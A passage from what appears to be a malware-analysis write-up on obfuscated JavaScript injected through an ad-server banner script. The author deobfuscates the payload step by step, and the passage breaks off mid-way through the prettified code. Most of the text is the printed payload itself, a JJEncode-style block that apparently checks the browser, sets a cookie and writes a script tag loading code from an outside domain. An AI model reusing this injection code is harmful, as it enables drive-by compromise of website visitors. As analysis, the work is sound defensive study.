\\\"+$a.__$+$a.$_$+$a.__$+$a.__+$a.$$$_+(![]+\"\")[$a._$_]+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"(\\\\\\\"<" + "\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\\\"+\\\\\\\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.__+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"=\'\\\\\"+$a.__$+$a.$_$+$a.___+$a.__+$a.__+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"://\"+$a.$_$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\".\"+$a.$_$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$$+$a._$_+\"/\"+$a.___+$a.$$__+$a.$$__+$a._$_+$a._$_+$a.$$$+$a.$_$+$a.$$_+\".\\\\\"+$a.__$+$a.$_$+$a._$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"?\"+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"=\"+$a.$_$_+$a.$$_$+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$_$_+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"-\\\\\"+$a.__$+$a.$$_+$a._$$+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.__$+\".\"+$a.$$__+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+\"\'><" + "/\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\\\"+\\\\\\\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.__+\">\\\\\\\");}\"+\"\\\"\")())();}catch(e){}<" + "/script><" + "!--ffnqt-->\n";
Interestingly, we see that exact same block of code repeated three times with only slight variations in the enclosing HTML tags. The first one above simply puts javascript in a <script> tag. The second encloses it in a <div> tag with an id attribute in addition to the <script> tag. The third instance goes back to using just a <script> tag, but prepends it with a linked image:
<a href='http://ad.same-story.com/delivery/ck.php?oaparams=2__bannerid=155__zoneid=9__cb=956c2f8948__oadest=http%3A%2F%2Fhome.edt02.net%2Femc%2Fbanner%2Fmstbc.php%3Fc%3D40060-195305-99922-0-335287' target='_blank'><img src='http://ad.same-story.com/images/9b4c7c85bcd76a4593020663b97f5dec.gif' width='300' height='250' alt='' title='' border='0' /></a>
This looks a lot like a banner ad, and a quick check of the domains against VirusTotal confirms that suspicion:
That second one should raise an eyebrow since "adult content" combined with "ads" can often lead to malicious content injection. We still haven't found anything outright malicious, though, so let's continue on.
Next we see the same block of unintelligible code repeated yet again, followed by this:
OX_0f4f918e += "<" + "script type=\'text/javascript\'><" + "!--// <" + "![CDATA[\n";
OX_0f4f918e += "var ox_swf = new FlashObject(\'http://ad.same-story.com/images/abcf302d1728cb4ec9ebbc5360497402.swf\', \'Advertisement\', \'300\', \'250\', \'9\');\n";
OX_0f4f918e += "ox_swf.addVariable(\'clickTARGET\', \'_blank\');\n";
OX_0f4f918e += "ox_swf.addVariable(\'clickTAG\', \'http%3A%2F%2Fad.same-story.com%2Fdelivery%2Fck.php%3Foaparams%3D2__bannerid%3D155__zoneid%3D9__cb%3D956c2f8948__oadest%3Dhttp%253A%252F%252Fhome.edt02.net%252Femc%252Fbanner%252Fmstbc.php%253Fc%253D40060-195305-99922-0-335287\');\n";
OX_0f4f918e += "ox_swf.addParam(\'allowScriptAccess\',\'always\');\n";
OX_0f4f918e += "ox_swf.write(\'ox_64ea63b5f76eb3c481ad44a961e2c479\');\n";
OX_0f4f918e += "if (ox_swf.installedVer.versionIsValid(ox_swf.getAttribute(\'version\'))) { document.write(\"<" + "div id=\'beacon_956c2f8948\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><" + "img src=\'http://ad.same-story.com/delivery/lg.php?bannerid=155&campaignid=27&zoneid=9&cb=956c2f8948\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><" + "/div>\"); } else { document.write(\"<" + "div id=\'beacon_956c2f8948\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><" + "img src=\'http://ad.same-story.com/delivery/lg.php?bannerid=155&campaignid=27&zoneid=9&fb=1&cb=956c2f8948\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><" + "/div>\"); }\n";
It looks like a banner ad link is now being attached to the Flash object itself. We then have a single-pixel tracking beacon placed on the page for those who have javascript disabled:
OX_0f4f918e += "// ]]> --><" + "/script><" + "noscript><" + "div id=\'beacon_956c2f8948\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><" + "img src=\'http://ad.same-story.com/delivery/lg.php?bannerid=155&campaignid=27&zoneid=9&fb=1&cb=956c2f8948\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><" + "/div><" + "/noscript>
...and then one more copy of the unintelligible code. Finally, the last line prints all of the above to the browser page:
document.write(OX_0f4f918e);
What have we learned so far? Not much, really, except that somebody really wants that unintelligible code block to execute. So much so that they thought it would be a good idea to print it to the page four times! I admit I don't understand why they chose this particular tactic, but perhaps since each block includes a try {} statement, they are simply giving the script multiple chances to execute successfully. Now let's see if we can't figure out what it's actually trying to do.
Step 3: Deobfuscation
Here we finally get to the fun part: deobfuscating the unintelligible code. Let's isolate the block of code we care about:
try{$a=~[];$a={___:++$a,$$$$:(![]+\"\")[$a],__$:++$a,$_$_:(![]+\"\")[$a],_$_:++$a,$_$$:({}+\"\")[$a],$$_$:($a[$a]+\"\")[$a],_$$:++$a,$$$_:(!\"\"+\"\")[$a],$__:++$a,$_$:++$a,$$__:({}+\"\")[$a],$$_:++$a,$$$:++$a,$___:++$a,$__$:++$a};$a.$_=($a.$_=$a+\"\")[$a.$_$]+($a._$=$a.$_[$a.__$])+($a.$$=($a.$+\"\")[$a.__$])+((!$a)+\"\")[$a._$$]+($a.__=$a.$_[$a.$$_])+($a.$=(!\"\"+\"\")[$a.__$])+($a._=(!\"\"+\"\")[$a._$_])+$a.$_[$a.$_$]+$a.__+$a._$+$a.$;$a.$$=$a.$+(!\"\"+\"\")[$a._$$]+$a.__+$a._+$a.$+$a.$$;$a.$=($a.___)[$a.$_][$a.$_];$a.$($a.$($a.$$+\"\\\"\"+$a.$$_$+\"=\"+$a.$$_$+$a._$+$a.$$__+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\"+$a._+$a.$_$_+\"=\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a.$$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$_$_+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\".\"+$a._+\"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.___+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$$+\"(\"+$a.$$_$+\"._\\\\\"+$a.__$+$a.$$$+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"===\"+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a.$$$_+$a.$$$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$$_+$a.$$_$+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a.$$_$+\".\"+$a.$$__+$a._$+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a._$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'_\"+$a._+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+\"=\')==-\"+$a.__$+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a._+$a.$_$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'\\\\\"+$a.__$+$a._$_+$a.$$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a.$$$+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.__$+$a.$$_+\"\\\\\"+$a.__$+$a._$_+$a.$__+\"\\\\\"+$a.$__+$a.___+\"\')>\"+$a.___+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a._+$a.$_$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'\\\\\"+$a.__$+$a.__$+$a.$_$+\"\\\\\"+$a.__$+$a._$_+$a._$$+\"\\\\\"+$a.__$+$a.__$+$a.__$+\"\\\\\"+$a.__$+$a.___+$a.$_$+\"\\\\\"+$a.$__+$a.___+\"\')>\"+$a.___+\")\\\\\"+$a.$__+$a.___+\"{\"+$a.$$_$+\"._\\\\\"+$a.__$+$a.$$$+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"=\"+$a.__$+\";\"+$a.$$_$+\".\"+$a.$$__+$a._$+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a._$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+\"=\'__\"+$a._+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+\"=\"+$a.__$+\";\\\\\"+$a.$__+$a.___+$a.$$$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"=\\\\\"+$a.__$+$a._$_+$a.$$$+$a.$$$_+$a.$$_$+\",\\\\\"+$a.$__+$a.___+$a.___+$a.__$+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.__$+$a._$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"\\\\\"+$a.$__+$a.___+$a._$_+$a.___+$a._$_+$a.___+\"\\\\\"+$a.$__+$a.___+$a.___+$a.___+\":\"+$a.___+$a.___+\":\"+$a.___+$a.___+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a._$_+$a.$_$+\"\\\\\"+$a.__$+$a._$_+$a.$__+\"\\\\\"+$a.__$+$a.___+$a._$$+\";\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.$_$_+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"=/\';\"+$a.$$_$+\".\\\\\"+$a.__$+$a.$$_+$a.$$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.__+$a.$$$_+(![]+\"\")[$a._$_]+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"(\\\\\\\"<" + "\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\\\"+\\\\\\\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.__+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"=\'\\\\\"+$a.__$+$a.$_$+$a.___+$a.__+$a.__+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"://\"+$a.$_$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\".\"+$a.$_$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$$+$a._$_+\"/\"+$a.___+$a.$$__+$a.$$__+$a._$_+$a._$_+$a.$$$+$a.$_$+$a.$$_+\".\\\\\"+$a.__$+$a.$_$+$a._$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"?\"+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"=\"+$a.$_$_+$a.$$_$+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$_$_+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"-\\\\\"+$a.__$+$a.$$_+$a._$$+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.__$+\".\"+$a.$$__+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+\"\'><" + "/\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\\\"+\\\\\\\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.__+\">\\\\\\\");}\"+\"\\\"\")())();}catch(e){}
Since that block of code was assigned to a variable as a string, it contains several quotes and other characters that are escaped. Specifically, we can see double quotes, single quotes, and backslashes that need to be unescaped. Order of operations is important here: we need to unescape the backslashes first, then each set of quotes. The result is a bit cleaner:
try{$a=~[];$a={___:++$a,$$$$:(![]+"")[$a],__$:++$a,$_$_:(![]+"")[$a],_$_:++$a,$_$$:({}+"")[$a],$$_$:($a[$a]+"")[$a],_$$:++$a,$$$_:(!""+"")[$a],$__:++$a,$_$:++$a,$$__:({}+"")[$a],$$_:++$a,$$$:++$a,$___:++$a,$__$:++$a};$a.$_=($a.$_=$a+"")[$a.$_$]+($a._$=$a.$_[$a.__$])+($a.$$=($a.$+"")[$a.__$])+((!$a)+"")[$a._$$]+($a.__=$a.$_[$a.$$_])+($a.$=(!""+"")[$a.__$])+($a._=(!""+"")[$a._$_])+$a.$_[$a.$_$]+$a.__+$a._$+$a.$;$a.$$=$a.$+(!""+"")[$a._$$]+$a.__+$a._+$a.$+$a.$$;$a.$=($a.___)[$a.$_][$a.$_];$a.$($a.$($a.$$+"\""+$a.$$_$+"="+$a.$$_$+$a._$+$a.$$__+$a._+"\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+"\\"+$a.__$+$a.$_$+$a.$$_+$a.__+";"+$a._+$a.$_$_+"=\\"+$a.__$+$a.$_$+$a.$$_+$a.$_$_+"\\"+$a.__$+$a.$$_+$a.$$_+"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$__+$a.$$$+$a.$_$_+$a.__+$a._$+"\\"+$a.__$+$a.$$_+$a._$_+"."+$a._+"\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+"\\"+$a.__$+$a.$$_+$a._$_+"\\"+$a.__$+$a.___+$a.__$+"\\"+$a.__$+$a.$__+$a.$$$+$a.$$$_+"\\"+$a.__$+$a.$_$+$a.$$_+$a.__+";\\"+$a.__$+$a.$_$+$a.__$+$a.$$$$+"("+$a.$$_$+"._\\"+$a.__$+$a.$$$+$a._$_+"\\"+$a.__$+$a.$$$+$a.___+"==="+$a._+"\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a.$$$_+$a.$$$$+"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$_$+$a.$$_+$a.$$$_+$a.$$_$+"\\"+$a.$__+$a.___+"&&\\"+$a.$__+$a.___+$a.$$_$+"."+$a.$$__+$a._$+$a._$+"\\"+$a.__$+$a.$_$+$a._$$+"\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+".\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+"\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+"\\"+$a.__$+$a.$_$+$a.___+"('_"+$a._+$a.__+"\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+"=')==-"+$a.__$+"\\"+$a.$__+$a.___+"&&\\"+$a.$__+$a.___+$a._+$a.$_$_+".\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+"\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+"\\"+$a.__$+$a.$_$+$a.___+"('\\"+$a.__$+$a._$_+$a.$$$+"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a._$+"\\"+$a.__$+$a.$$_+$a.$$$+"\\"+$a.__$+$a.$$_+$a._$$+"\\"+$a.$__+$a.___+"\\"+$a.__$+$a.__$+$a.$$_+"\\"+$a.__$+$a._$_+$a.$__+"\\"+$a.$__+$a.___+"')>"+$a.___+"\\"+$a.$__+$a.___+"&&\\"+$a.$__+$a.___+$a._+$a.$_$_+".\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+"\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+"\\"+$a.__$+$a.$_$+$a.___+"('\\"+$a.__$+$a.__$+$a.$_$+"\\"+$a.__$+$a._$_+$a._$$+"\\"+$a.__$+$a.__$+$a.__$+"\\"+$a.__$+$a.___+$a.$_$+"\\"+$a.$__+$a.___+"')>"+$a.___+")\\"+$a.$__+$a.___+"{"+$a.$$_$+"._\\"+$a.__$+$a.$$$+$a._$_+"\\"+$a.__$+$a.$$$+$a.___+"="+$a.__$+";"+$a.$$_$+"."+$a.$$__+$a._$+$a._$+"\\"+$a.__$+$a.$_$+$a._$$+"\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+"='__"+$a._+$a.__+"\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+"="+$a.__$+";\\"+$a.$__+$a.___+$a.$$$_+"\\"+$a.__$+$a.$$$+$a.___+"\\"+$a.__$+$a.$$_+$a.___+"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$$_+$a._$_+$a.$$$_+"\\"+$a.__$+$a.$$_+$a._$$+"=\\"+$a.__$+$a._$_+$a.$$$+$a.$$$_+$a.$$_$+",\\"+$a.$__+$a.___+$a.___+$a.__$+"\\"+$a.$__+$a.___+"\\"+$a.__$+$a.__$+$a._$_+$a.$_$_+"\\"+$a.__$+$a.$_$+$a.$$_+"\\"+$a.$__+$a.___+$a._$_+$a.___+$a._$_+$a.___+"\\"+$a.$__+$a.___+$a.___+$a.___+":"+$a.___+$a.___+":"+$a.___+$a.___+"\\"+$a.$__+$a.___+"\\"+$a.__$+$a._$_+$a.$_$+"\\"+$a.__$+$a._$_+$a.$__+"\\"+$a.__$+$a.___+$a._$$+";\\"+$a.$__+$a.___+"\\"+$a.__$+$a.$$_+$a.___+$a.$_$_+$a.__+"\\"+$a.__$+$a.$_$+$a.___+"=/';"+$a.$$_$+".\\"+$a.__$+$a.$$_+$a.$$$+"\\"+$a.__$+$a.$$_+$a._$_+"\\"+$a.__$+$a.$_$+$a.__$+$a.__+$a.$$$_+(![]+"")[$a._$_]+"\\"+$a.__$+$a.$_$+$a.$$_+"(\\\"<" + "\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+"\\"+$a.__$+$a.$$_+$a._$_+"\\\"+\\\"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$$_+$a.___+$a.__+"\\"+$a.$__+$a.___+"\\"+$a.__$+$a.$$_+$a._$$+"\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+"='\\"+$a.__$+$a.$_$+$a.___+$a.__+$a.__+"\\"+$a.__$+$a.$$_+$a.___+"://"+$a.$_$$+"\\"+$a.__$+$a.$$_+$a._$_+"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$_$+$a.$$_+"\\"+$a.__$+$a.$$_+$a._$$+"."+$a.$_$$+"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$$$+$a._$_+"/"+$a.___+$a.$$__+$a.$$__+$a._$_+$a._$_+$a.$$$+$a.$_$+$a.$$_+".\\"+$a.__$+$a.$_$+$a._$_+"\\"+$a.__$+$a.$$_+$a._$$+"?"+$a.$$__+"\\"+$a.__$+$a.$$_+$a.___+"="+$a.$_$_+$a.$$_$+".\\"+$a.__$+$a.$$_+$a._$$+$a.$_$_+"\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+"-\\"+$a.__$+$a.$$_+$a._$$+$a.__+$a._$+"\\"+$a.__$+$a.$$_+$a._$_+"\\"+$a.__$+$a.$$$+$a.__$+"."+$a.$$__+$a._$+"\\"+$a.__$+$a.$_$+$a.$_$+"'><" + "/\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+"\\"+$a.__$+$a.$$_+$a._$_+"\\"+$a.__$+$a.$_$+$a.__$+"\\\"+\\\"\\"+$a.__$+$a.$$_+$a.___+$a.__+">\\\");}"+"\"")())();}catch(e){}
Now we should be able to prettify this code a bit. Sometimes formatting can help to reveal the intent of certain code segments:
try {
$a = ~[];
$a = {
___: ++$a,
$$$$: (![] + "")[$a],
__$: ++$a,
$_$_: (![] + "")[$a],
_$_: ++$a,
$_$$: ({} + "")[$a],
$$_$: ($a[$a] + "")[$a],
_$$: ++$a,
$$$_: (!"" + "")[$a],
$__: ++$a,
$_$: ++$a,
$$__: ({} + "")[$a],
$$_: ++$a,
$$$: ++$a,
$___: ++$a,
$__$: ++$a
};
$a.$_ = ($a.$_ = $a + "")[$a.$_$] + ($a._$ = $a.$_[$a.__$]) + ($a.$$ = ($a.$ + "")[$a.__$]) + ((!$a) + "")[$a._$$] + ($a.__ = $a.$_[$a.$$_]) + ($a.$ = (!"" + "")[$a.__$]) + ($a._ = (!"" + "")[$a._$_]) + $a.$_[$a.$_$] + $a.__ + $a._$ + $a.$;
$a.$$ = $a.$ + (!"" + "")[$a._$$] + $a.__ + $a._ + $a.$ + $a.$$;
$a.$ = ($a.___)[$a.$_][$a.$_];
$a.$($a.$($a.$$ + "\"" + $a.$$_$ + "=" + $a.$$_$ + $a._$ + $a.$$__ + $a._ + "\\" + $a.__$ + $a.$_$ + $a.$_$ + $a.$$$_ + "\\" + $a.__$ + $a.$_$ + $a.$$_ + $a.__ + ";" + $a._ + $a.$_$_ + "=\\" + $a.__$ + $a.$_$ + $a.$$_ + $a.$_$_ + "\\" + $a.__$ + $a.$$_ + $a.$$_ + "\\" + $a.__$ + $a.$_$ + $a.__$ + "\\" + $a.__$ + $a.$__ + $a.$$$ + $a.$_$_ + $a.__ + $a._$ + "\\" + $a.__$ + $a.$$_ + $a._$_ + "." + $a._ + "\\" + $a.__$ + $a.$$_ + $a._$$ + $a.$$$_ + "\\" + $a.__$ + $a.$$_ + $a._$_ + "\\" + $a.__$ + $a.___ + $a.__$ + "\\" + $a.__$ + $a.$__ + $a.$$$ + $a.$$$_ + "\\" + $a.__$ + $a.$_$ + $a.$$_ + $a.__ + ";\\" + $a.__$ + $a.$_$ + $a.__$ + $a.$$$$ + "(" + $a.$$_$ + "._\\" + $a.__$ + $a.$$$ + $a._$_ + "\\" + $a.__$ + $a.$$$ + $a.___ + "===" + $a._ + "\\" + $a.__$ + $a.$_$ + $a.$$_ + $a.$$_$ + $a.$$$_ + $a.$$$$ + "\\" + $a.__$ + $a.$_$ + $a.__$ + "\\" + $a.__$ + $a.$_$ + $a.$$_ + $a.$$$_ + $a.$$_$ + "\\" + $a.$__ + $a.___ + "&&\\" + $a.$__ + $a.___ + $a.$$_$ + "." + $a.$$__ + $a._$ + $a._$ + "\\" + $a.__$ + $a.$_$ + $a._$$ + "\\" + $a.__$ + $a.$_$ + $a.__$ + $a.$$$_ + ".\\" + $a.__$ + $a.$$_ + $a._$$ + $a.$$$_ + $a.$_$_ + "\\" + $a.__$ + $a.$$_ + $a._$_ + $a.$$__ + "\\" + $a.__$ + $a.$_$ + $a.___ + "('_" + $a._ + $a.__ + "\\" + $a.__$ + $a.$_$ + $a.$_$ + $a._ + $a.$$_$ + "=')==-" + $a.__$ + "\\" + $a.$__ + $a.___ + "&&\\" + $a.$__ + $a.___ + $a._ + $a.$_$_ + ".\\" + $a.__$ + $a.$$_ + $a._$$ + $a.$$$_ + $a.$_$_ + "\\" + $a.__$ + $a.$$_ + $a._$_ + $a.$$__ + "\\" + $a.__$ + $a.$_$ + $a.___ + "('\\" + $a.__$ + $a._$_ + $a.$$$ + "\\" + $a.__$ + $a.$_$ + $a.__$ + "\\" + $a.__$ + $a.$_$ + $a.$$_ + $a.$$_$ + $a._$ + "\\" + $a.__$ + $a.$$_ + $a.$$$ + "\\" + $a.__$ + $a.$$_ + $a._$$ + "\\" + $a.$__ + $a.___ + "\\" + $a.__$ + $a.__$ + $a.$$_ + "\\" + $a.__$ + $a._$_ + $a.$__ + "\\" + $a.$__ + $a.___ + "')>" + $a.___ + "\\" + $a.$__ + $a.___ + "&&\\" + $a.$__ + $a.___ + $a._ + $a.$_$_ + ".\\" + $a.__$ + $a.$$_ + $a._$$ + $a.$$$_ + $a.$_$_ + "\\" + $a.__$ + $a.$$_ + $a._$_ + $a.$$__ + "\\" + $a.__$ + $a.$_$ + $a.___ + "('\\" + $a.__$ + $a.__$ + $a.$_$ + "\\" + $a.__$ + $a._$_ + $a._$$ + "\\" + $a.__$ + $a.__$ + $a.__$ + "\\" + $a.__$ + $a.___ + $a.$_$ + "\\" + $a.$__ + $a.___ + "')>" + $a.___ + ")\\" + $a.$__ + $a.___ + "{" + $a.$$_$ + "._\\" + $a.__$ + $a.$$$ + $a._$_ + "\\" + $a.__$ + $a.$$$ + $a.___ + "=" + $a.__$ + ";" + $a.$$_$ + "." + $a.$$__ + $a._$ + $a._$ + "\\" + $a.__$ + $a.$_$ + $a._$$ + "\\" + $a.__$ + $a.$_$ + $a.__$ + $a.$$$_ + "='__" + $a._ + $a.__ + "\\" + $a.__$ + $a.$_$ + $a.$_$ + $a._ + $a.$$_$ + "=" + $a.__$ + ";\\" + $a.$__ + $a.___ + $a.$$$_ + "\\" + $a.__$ + $a.$$$ + $a.___ + "\\" + $a.__$ + $a.$$_ + $a.___ + "\\" + $a.__$ + $a.$_$ + $a.__$ + "\\" + $a.__$ + $a.$$_ + $a._$_ + $a.$$$_ + "\\" + $a.__$ + $a.$$_ + $a._$$ + "=\\" + $a.__$ + $a._$_ + $a.$$$ + $a.$$$_ + $a.$$_$ + ",\\" + $a.$__ + $a.___ + $a.___ + $a.__$ + "\\" + $a.$__ + $a.___ + "\\" + $a.__$ + $a.__$ + $a._$_ + $a.$_$_ + "\\" + $a.__$ + $a.$_$ + $a.$$_ + "\\" + $a.$__ + $a.___ + $a._$_ + $a.___ + $a._$_ + $a.___ + "\\" + $a.$__ + $a.___ + $a.___ + $a.___ + ":" + $a.___ + $a.___ + ":" + $a.___ + $a.___ + "\\" + $a.$__ + $a.___ + "\\" + $a.__$ + $a._$_ + $a.$_$ + "\\" + $a.__$ + $a._$_ + $a.$__ + "\\" + $a.__$ + $a.___ + $a._$$ + ";\\" + $a.$__ + $a.___ + "\\" + $a.__$ + $a.$$_ + $a.___ + $a.$_$_ + $a.__ + "\\" + $a.__$ + $a.$_$ + $a.___ + "=/';" + $a.$$_$ + ".\\" + $a.__$ + $a.$$_ + $a.$$$ + "\\" + $a.__$ + $a.$$_ + $a._$_ + "\\" + $a.__$ + $a.$_$ + $a.__$ + $a.__ + $a.$$$_ + (![] + "")[$a._$_] + "\\" + $a.__$ + $a.$_$ + $a.$$_ + "(\\\"<" + "\\" + $a.__$ + $a.$$_ + $a._$$ + $a.$$__ + "\\" + $a.__$ + $a.$$_ + $a._$_ + "\\\"+\\\"\\" + $a.__$ + $a.$_$ + $a.__$ + "\\" + $a.__$ + $a.$$_ + $a.___ + $a.__ + "\\" + $a.$__ + $a.___ + "\\" + $a.__$ + $a.$$_ + $a._$$ + "\\" + $a.__$ + $a.$$_ + $a._$_ + $a.$$__ + "='\\" + $a.__$ + $a.$_$ + $a.___ + $a.__ + $a.__ + "\\" + $a.__$ + $a.$$_ + $a.___ + "://" + $a.$_$$ + "\\" + $a.__$ + $a.$$_ + $a._$_ + "\\" + $a.__$ + $a.$_$ + $a.__$ + "\\" + $a.__$ + $a.$_$ + $a.$$_ + "\\" + $a.__$ + $a.$$_ + $a._$$ + "." + $a.$_$$ + "\\" + $a.__$ + $a.$_$ + $a.__$ + "\\" + $a.__$ + $a.$$$ + $a._$_ + "/" + $a.___ + 